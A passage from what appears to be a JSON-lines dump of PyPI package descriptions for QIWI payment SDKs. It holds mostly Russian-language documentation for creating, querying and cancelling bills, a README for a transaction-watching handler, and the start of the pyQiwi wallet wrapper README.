\u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u0432\u044b\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u043e\u0442\u043c\u0435\u043d\u044b \u0441\u0447\u0435\u0442\u043e\u0432, \u0432\u043e\u0437\u0432\u0440\u0430\u0442\u0430 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u043f\u043e \u043e\u043f\u043b\u0430\u0447\u0435\u043d\u043d\u044b\u043c \u0441\u0447\u0435\u0442\u0430\u043c, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0441\u0442\u0430\u0442\u0443\u0441\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439.\u041f\u043b\u0430\u0442\u0435\u0436\u043d\u0430\u044f \u0444\u043e\u0440\u043c\u0430\u041f\u0440\u043e\u0441\u0442\u043e\u0439 \u0441\u043f\u043e\u0441\u043e\u0431 \u0434\u043b\u044f \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0438. \u041f\u0440\u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0438 \u0444\u043e\u0440\u043c\u044b \u043a\u043b\u0438\u0435\u043d\u0442\u0443 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u044b\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0441\u0447\u0435\u0442. \u041f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u0441\u0447\u0435\u0442\u0430 \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435 \u0432 \u0441\u0441\u044b\u043b\u043a\u0435. \u0414\u0430\u043b\u0435\u0435 \u043a\u043b\u0438\u0435\u043d\u0442\u0443 \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0430\u0435\u0442\u0441\u044f \u043f\u043b\u0430\u0442\u0435\u0436\u043d\u0430\u044f \u0444\u043e\u0440\u043c\u0430 \u0441 \u0432\u044b\u0431\u043e\u0440\u043e\u043c \u0441\u043f\u043e\u0441\u043e\u0431\u0430 \u043e\u043f\u043b\u0430\u0442\u044b. \u041f\u0440\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u044d\u0442\u043e\u0433\u043e \u0441\u043f\u043e\u0441\u043e\u0431\u0430 \u043d\u0435\u043b\u044c\u0437\u044f \u0433\u0430\u0440\u0430\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c, \u0447\u0442\u043e \u0432\u0441\u0435 \u0441\u0447\u0435\u0442\u0430 \u0432\u044b\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u044b \u043c\u0435\u0440\u0447\u0430\u043d\u0442\u043e\u043c, \u0432 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442 \u0432\u044b\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u043e API.\u041c\u0435\u0442\u043e\u0434createPaymentForm\u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u043f\u043b\u0430\u0442\u0435\u0436\u043d\u0443\u044e \u0444\u043e\u0440\u043c\u0443. \u0412 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u0445 \u043d\u0443\u0436\u043d\u043e \u0443\u043a\u0430\u0437\u0430\u0442\u044c: \u043a\u043b\u044e\u0447 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0430, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0439 \u0432 QIWI \u041a\u0430\u0441\u0441\u0435publicKey, \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u0441\u0447\u0435\u0442\u0430billId\u0432\u043d\u0443\u0442\u0440\u0438 \u0432\u0430\u0448\u0435\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0438 \u0441\u0443\u043c\u043c\u0443amount. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0431\u0443\u0434\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0430 \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u0444\u043e\u0440\u043c\u0443 \u043e\u043f\u043b\u0430\u0442\u044b, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043c\u043e\u0436\u043d\u043e \u043f\u0435\u0440\u0435\u0434\u0430\u0442\u044c \u043a\u043b\u0438\u0435\u043d\u0442\u0443. \u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435 \u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u0445 \u0432\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438.params={'publicKey':qiwiApi.public_key,'amount':200,'billId':'893794793973','successUrl':'https://merchant.com/payment/success?billId=893794793973'}link=qiwiApi.createPaymentForm(params)\u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435:https://oplata.qiwi.com/create?publicKey=2tbp1WQvsgQeziGY9vTLe9vDZNg7tmCymb4Lh6STQokqKrpCC6qrUUKEDZAJ7mvFnzr1yTebUiQaBLDnebLMMxL8nc6FF5zfmGQnypdXCbQJqHEJW5RJmKfj8nvgc&amount=200&billId=893794793973&successUrl=https%3A%2F%2Fmerchant.com%2Fpayment%2Fsuccess%3FbillId%3D893794793973&customFields[apiClient]=python_sdk&customFields[apiClientVersion]=3.1.2\u0412\u044b\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0441\u0447\u0435\u0442\u0430\u041d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0441\u043f\u043e\u0441\u043e\u0431 \u0434\u043b\u044f \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0438. \u041f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f server2server \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438. \u041c\u0435\u0442\u043e\u0434 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0441\u0447\u0435\u0442, \u043f\u0440\u0438 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0438 \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u0432 \u043e\u0442\u0432\u0435\u0442\u0435 \u0432\u0435\u0440\u043d\u0435\u0442\u0441\u044f \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440payUrl- \u0441\u0441\u044b\u043b\u043a\u0430 \u0434\u043b\u044f \u0440\u0435\u0434\u0438\u0440\u0435\u043a\u0442\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043d\u0430 \u043f\u043b\u0430\u0442\u0435\u0436\u043d\u0443\u044e \u0444\u043e\u0440\u043c\u0443.\u041c\u0435\u0442\u043e\u0434createBill\u0432\u044b\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u043d\u043e\u0432\u044b\u0439 \u0441\u0447\u0435\u0442. \u0412 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u0445 \u043d\u0443\u0436\u043d\u043e \u0443\u043a\u0430\u0437\u0430\u0442\u044c: \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u0441\u0447\u0435\u0442\u0430billId\u0432\u043d\u0443\u0442\u0440\u0438 \u0432\u0430\u0448\u0435\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0438 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u0438 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u043c\u0438fields. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0431\u0443\u0434\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0435\u043d \u043e\u0442\u0432\u0435\u0442 \u0441 \u0434\u0430\u043d\u043d\u044b\u043c\u0438 \u043e \u0432\u044b\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u043c \u0441\u0447\u0435\u0442\u0435.billId='cc961e8d-d4d6-4f02-b737-2297e51fb48e'fields={'amount':1.00,'currency':'RUB','comment':'test','expirationDateTime':'2018-03-02T08:44:07','email':'example@mail.org','account':'client4563','successUrl':'http://test.ru/'}bill=qiwiApi.createBill(billId,fields)\u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435:{\"siteId\":\"270305\",\"billId\":\"cc961e8d-d4d6-4f02-b737-2297e51fb48e\",\"amount\":{\"currency\":\"RUB\",\"value\":\"200.34\"},\"status\":{\"value\":\"WAITING\",\"changedDateTime\":\"2018-07-12T10:28:38.855+03:00\"},\"comment\":\"test\",\"creationDateTime\":\"2018-07-12T10:28:38.855+03:00\",\"expirationDateTime\":\"2018-08-26T10:28:38.855+03:00\",\"payUrl\":\"https://oplata.qiwi.com/form/?invoice_uid=bb773791-9bd9-42c1-b8fc-3358cd108422&successUrl=http%3A%2F%2Ftest.ru%2F\"}\u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e \u0441\u0447\u0435\u0442\u0435\u041c\u0435\u0442\u043e\u0434getBillInfo\u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0441\u0447\u0435\u0442\u0435. \u0412 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u0445 \u043d\u0443\u0436\u043d\u043e \u0443\u043a\u0430\u0437\u0430\u0442\u044c \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u0441\u0447\u0435\u0442\u0430billId\u0432\u043d\u0443\u0442\u0440\u0438 \u0432\u0430\u0448\u0435\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0431\u0443\u0434\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0435\u043d \u043e\u0442\u0432\u0435\u0442 \u0441\u043e \u0441\u0442\u0430\u0442\u0443\u0441\u043e\u043c \u0441\u0447\u0435\u0442\u0430. \u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435 \u0432\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438.billId='cc961e8d-d4d6-4f02-b737-2297e51fb48e';billInfo=qiwiApi.getBillInfo(billId)\u041e\u0442\u0432\u0435\u0442:{\"siteId\":\"270305\",\"billId\":\"cc961e8d-d4d6-4f02-b737-2297e51fb48e\",\"amount\":{\"currency\":\"RUB\",\"value\":\"200.34\"},\"status\":{\"value\":\"WAITING\",\"changedDateTime\":\"2018-07-12T10:31:06.846+03:00\"},\"comment\":\"test\",\"creationDateTime\":\"2018-07-12T10:31:06.846+03:00\",\"expirationDateTime\":\"2018-08-26T10:31:06.846+03:00\",\"payUrl\":\"https://oplata.qiwi.com/form/?invoice_uid=ee3ad91d-cfb8-4dbf-8449-b6859fdfec3c\"}\u041e\u0442\u043c\u0435\u043d\u0430 \u043d\u0435\u043e\u043f\u043b\u0430\u0447\u0435\u043d\u043d\u043e\u0433\u043e \u0441\u0447\u0435\u0442\u0430\u041c\u0435\u0442\u043e\u0434cancelBill\u043e\u0442\u043c\u0435\u043d\u044f\u0435\u0442 \u043d\u0435\u043e\u043f\u043b\u0430\u0447\u0435\u043d\u043d\u044b\u0439 \u0441\u0447\u0435\u0442. \u0412 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u0445 \u043d\u0443\u0436\u043d\u043e \u0443\u043a\u0430\u0437\u0430\u0442\u044c \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 \u0441\u0447\u0435\u0442\u0430billId\u0432\u043d\u0443\u0442\u0440\u0438 \u0432\u0430\u0448\u0435\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0431\u0443\u0434\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0435\u043d \u043e\u0442\u0432\u0435\u0442 \u0441 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u043e \u0441\u0447\u0435\u0442\u0435. \u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0435\u0435 \u0432\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438.billId='cc961e8d-d4d6-4f02-b737-2297e51fb48e'qiwiApi.cancelBill(billId)\u041e\u0442\u0432\u0435\u0442:{\"siteId\":\"270305\",\"billId\":\"cc961e8d-d4d6-4f02-b737-2297e51fb48e\",\"amount\":{\"currency\":\"RUB\",\"value\":\"200.34\"},\"status\":{\"value\":\"REJECTED\",\"changedDateTime\":\"2018-07-12T10:32:17.595+03:00\"},\"comment\":\"test\",\"creationDateTime\":\"2018-07-12T10:32:17.481+03:00\",\"expirationDateTime\":\"2018-08-26T10:32:17.481+03:00\",\"payUrl\":\"https://oplata.qiwi.com/form/?invoice_uid=cc961e8d-d4d6-4f02-b737-2297e51fb48e\"}"} +{"package": "qiwi-bills", "pacakge-description": "No description available on PyPI."} +{"package": "qiwibyadam", "pacakge-description": "No description available on PyPI."} +{"package": "qiwi-handler", "pacakge-description": "\u043f\u043e\u043b\u043d\u0430\u044f \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f \u0435\u0449\u0435 \u043d\u0435 \u0432\u044b\u0448\u043b\u0430, \u043d\u043e \u0435\u0441\u0442\u044c....\u042d\u0442\u0430 \u0448\u0442\u0443\u043a\u0430 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 \u0434\u0435\u043a\u043e\u0440\u0430\u0442\u043e\u0440\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043e\u0442\u043b\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442 \u0442\u0440\u0430\u043d\u0437\u0430\u043a\u0446\u0438\u0438 \u043a\u043e\u0448\u0435\u043b\u044c\u043a\u0430.\n\u0414\u043b\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0435\u0441\u0442\u044c client.run(), \u0438 await client.idle() \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0432\u0435\u043d\u043d\u043e. \u041e\u0431\u0430 \u043e\u043d\u0438 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0430\u0441\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u043d\u044b\u043c\u0438, \u043d\u043e run()\n\u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u043d\u043e\u0432\u044b\u0439 \u043b\u0443\u043f, \u0438 \u043d\u0435 \u043d\u0443\u0436\u0434\u0430\u0435\u0442\u0441\u044f \u0432 \u0437\u0430\u043f\u0443\u0441\u043a\u0435 \u0441 await\u041e\u0427\u0415\u041d\u042c \u0412\u0410\u0416\u041d\u041e!\u0412\u0440\u0435\u043c\u044f \u043d\u0430 \u043a\u043e\u043c\u044c\u044e\u0442\u0435\u0440\u0435 \u0434\u043e\u043b\u0436\u043d\u043e \u0431\u044b\u0442\u044c \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u044b\u043c!\u0438\u043d\u0430\u0447\u0435 - \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u0431\u0443\u0434\u0435\u0442 \u043b\u043e\u0432\u0438\u0442\u044c!\u043f\u0440\u0438\u043c\u0435\u0440:from client import Client\nfrom objects.account_api.types.history import History\nclient = Client(TOKEN)\n\n@client.check_pay(wallets=[PHONE NUMBER], \n amount=5, may_be_bigger=True)\ndef func(pay: History):\n print(pay)\n\nclient.run()\u0442\u0438\u043f\u044b:\u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0442\u0438\u043f\u044b:\nHistory, UserInfo\u0438\u043c\u043f\u043e\u0440\u0442:from qiwi_handler.types import History, UserInfo\u0415\u0441\u043b\u0438 \u0432\u0430\u043c IDE \u043d\u0435 \u043f\u043e\u043c\u043e\u0433\u0430\u0435\u0442 \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0442\u044c \u0444\u0443\u043d\u043a\u0446\u0438\u044f, \u0438\u043b\u0438 \u0432\u0430\u043c \u043d\u0430\u0434\u043e \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u0438\u0437\u0443\u0447\u0438\u0442\u044c \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e:https://developer.qiwi.com/ru/qiwi-wallet-personal/index.html#restrictionsHistory (\u0418\u0441\u0442\u043e\u0440\u0438\u044f \u043f\u043b\u0430\u0442\u0435\u0436\u0435\u0439)(* - \u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e)@client.check_pay() - \u0432\u044b\u0448\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0439 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a - \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442 Historywallet: str- (\u043d\u043e\u043c\u0435\u0440 \u043a\u043e\u0448\u0435\u043b\u044c\u043a\u0430(\u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0430))rows: int = 5- (\u041a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0442\u0440\u0430\u043d\u0437\u0430\u043a\u0446\u0438\u0439),operation: str = None- (\u0422\u0438\u043f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439 \u0432 \u043e\u0442\u0447\u0435\u0442\u0435, \u0434\u043b\u044f \u043e\u0442\u0431\u043e\u0440\u0430 (ALL, IN, OUT, QIWI_CARD)),sources: list = None- (\u0421\u043f\u0438\u0441\u043e\u043a \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u043e\u0432 \u043f\u043b\u0430\u0442\u0435\u0436\u0430, \u0434\u043b\u044f \u0444\u0438\u043b\u044c\u0442\u0440\u0430 (QW_RUB, QW_USD, QW_EUR, CARD, MK)),start_date: str = None- \u041d\u0430\u0447\u0430\u043b\u044c\u043d\u0430\u044f \u0434\u0430\u0442\u0430 \u043f\u043e\u0438\u0441\u043a\u0430 \u043f\u043b\u0430\u0442\u0435\u0436\u0435\u0439 (DateTime URL-encoded),end_date: str = None- \u041a\u043e\u043d\u0435\u0447\u043d\u0430\u044f \u0434\u0430\u0442\u0430 \u043f\u043e\u0438\u0441\u043a\u0430 \u043f\u043b\u0430\u0442\u0435\u0436\u0435\u0439 (DateTime URL-encoded),next_txn_date: str = None- \u0414\u0430\u0442\u0430 \u0442\u0440\u0430\u043d\u0437\u0430\u043a\u0446\u0438\u0438 \u0434\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u043e\u0442\u0447\u0435\u0442\u0430(DateTime URL-encoded),next_txn_id: int = None- \u041d\u043e\u043c\u0435\u0440 \u0442\u0440\u0430\u043d\u0437\u0430\u043a\u0446\u0438\u0438 \u0434\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u043e\u0442\u0447\u0435\u0442\u0430client.history(wallet: str) - \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442 array[History]message: str(\u0441\u0442\u0440\u043e\u0433\u0430\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u043d\u0430 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u0435 \u043e\u043a\u043d\u0430 \"\u041a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0439 \u043a \u043f\u0435\u0440\u0435\u0432\u043e\u0434\u0443\"),* wallets: list(\u0441\u043f\u0438\u0441\u043e\u043a \u0438\u0437 \u043d\u043e\u043c\u0435\u0440\u043e\u0432 \u043a\u043e\u0448\u0435\u043b\u044c\u043a\u0430 (\u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0430), \u0441 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438\u0434\u0435\u0442 \u043f\u0430\u0440\u0441\u0438\u043d\u0433),amount: float(\u0441\u0442\u0440\u043e\u0433\u0430\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u043d\u0430 \u0441\u0443\u043c\u043c\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0443\u043a\u0430\u0437\u0430\u043d\u0430 \u0432 total (\u0441 \u0443\u0447. \u043a\u043e\u043c\u0438\u0441\u0438\u0438)),may_be_bigger: bool = True(\u043f\u0440\u0435\u0432\u0440\u0430\u0449\u0430\u0435\u0442 amount \u0432 \u043d\u0435 \u0441\u0442\u0440\u043e\u0433\u0443\u044e \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0443, \u0438 \u043f\u0440\u043e\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0441\u0443\u043c\u043c\u044b \u0432\u044b\u0448\u0435),check_status: bool = True(\u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u043d\u0430 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0441\u0442\u044c \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438),operation: str = \"ALL\"(\u0422\u0438\u043f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439 \u0432 \u043e\u0442\u0447\u0435\u0442\u0435, \u0434\u043b\u044f \u043e\u0442\u0431\u043e\u0440\u0430 (ALL, IN, OUT, QIWI_CARD)),updates_per_minute: int = 50(\u0412\u0410\u0416\u041d\u041e! \u0431\u043e\u043b\u0448\u0435 99 \u0432 \u043c\u0438\u043d\u0443\u0442\u0443 \u0432\u0430\u043c \u043d\u0435 \u0434\u0430\u0441\u0442 \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0441\u0438\u0441\u0435\u0442\u043c\u0430, \u0442.\u043a. \u0435\u0441\u043b\u0438 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435\n\u0431\u0443\u0434\u0435\u0442 \u0431\u043e\u043b\u0435\u0435 100 - \u0432\u0430\u0448 \u0430\u043f\u0438 \u043a\u0435\u0439 \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0442 \u043d\u0430 5 \u043c\u0438\u043d\u0443\u0442. \u0415\u0441\u043b\u0438 \u0432\u0430\u043c \u043d\u0435 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0441\u043a\u043e\u0440\u043e\u0441\u0442\u0438 - \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435 \u0431\u043e\u043b\u044c\u0448\u043e\u0435 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435\n\u0432 rows_per_update),rows_per_update: int = 5(\u041a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0442\u0440\u0430\u043d\u0437\u0430\u043a\u0446\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u043d\u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0443 \u0445\u0435\u043d\u0434\u043b\u0435\u0440\u0443,\n\u0431\u043e\u043b\u044c\u0448\u0435 50 \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u043d\u0435 \u0432\u044b\u0439\u0434\u0435\u0442)UserInfo (\u041f\u0440\u043e\u0444\u0438\u043b\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f)(* - \u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e)await client.get_current() - \u0432\u043e\u0437\u0430\u0440\u0432\u0449\u0430\u0435\u0442 UserInfoauth_info_enabled: bool = True- (\u041b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043f\u0440\u0438\u0437\u043d\u0430\u043a \u0432\u044b\u0433\u0440\u0443\u0437\u043a\u0438 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438),contract_info_enabled: bool = True- (\u041b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043f\u0440\u0438\u0437\u043d\u0430\u043a \u0432\u044b\u0433\u0440\u0443\u0437\u043a\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u043e \u0432\u0430\u0448\u0435\u043c QIWI \u043a\u043e\u0448\u0435\u043b\u044c\u043a\u0435),user_info_enabled: bool = True- (\u041b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043f\u0440\u0438\u0437\u043d\u0430\u043a \u0432\u044b\u0433\u0440\u0443\u0437\u043a\u0438 \u043f\u0440\u043e\u0447\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u0434\u0430\u043d\u043d\u044b\u0445.)"} +{"package": "qiwimaster", "pacakge-description": "No description available on PyPI."} +{"package": "qiwi-payments", "pacakge-description": "No description available on PyPI."} +{"package": "qiwipy", "pacakge-description": "======pyQiwi======Python Qiwi API Wrapper* \u041b\u0438\u0446\u0435\u043d\u0437\u0438\u044f: MIT* \u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f: https://pyqiwi.readthedocs.io.\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438-----------* \u041e\u043f\u043b\u0430\u0442\u0430 \u043b\u044e\u0431\u044b\u0445 \u0443\u0441\u043b\u0443\u0433* \u041f\u0435\u0440\u0435\u0432\u043e\u0434\u044b \u043d\u0430 \u043b\u044e\u0431\u043e\u0439 Qiwi \u041a\u043e\u0448\u0435\u043b\u0435\u043a* \u0421\u0442\u0430\u0442\u0438\u0441\u0442\u0438\u043a\u0430 \u043f\u043e \u043f\u043b\u0430\u0442\u0435\u0436\u0430\u043c* \u0418\u0441\u0442\u043e\u0440\u0438\u044f \u043e \u0441\u0434\u0435\u043b\u0430\u043d\u043d\u044b\u0445 \u043f\u043b\u0430\u0442\u0435\u0436\u0430\u0445 \u0432 \u043b\u044e\u0431\u043e\u0439 \u043f\u0440\u043e\u043c\u0435\u0436\u0443\u0442\u043e\u043a \u0432\u0440\u0435\u043c\u0435\u043d\u0438* \u041f\u0440\u043e\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u0435 \u0443\u043f\u0440\u043e\u0449\u0435\u043d\u043d\u043e\u0439 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438* \u041e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0430 \u043c\u043e\u0431\u0438\u043b\u044c\u043d\u043e\u0433\u043e \u0442\u0435\u043b\u0435\u0444\u043e\u043d\u0430\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430---------$ pip install qiwipy\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435---------import pyqiwiwallet = pyqiwi.Wallet(token='', number='79001234567')\u0411\u044b\u0441\u0442\u0440\u044b\u0439 \u0442\u0443\u0442\u043e\u0440\u0438\u0430\u043b----------------\u041f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u0431\u0430\u043b\u0430\u043d\u0441~~~~~~~~~~~~~~~~~~~~~~~print(wallet.balance())\u041e\u0442\u043f\u0440\u0430\u0432\u043a\u0430 \u043f\u043b\u0430\u0442\u0435\u0436\u0430~~~~~~~~~~~~~~~~payment = wallet.send(pid=99, recipient='79001234567', amount=1.11, comment='\u041f\u0440\u0438\u0432\u0435\u0442!')example = 'Payment is {0}\\nRecipient: {1}\\nPayment Sum: {2}'.format(payment.transaction['state']['code'], payment.fields['account'], 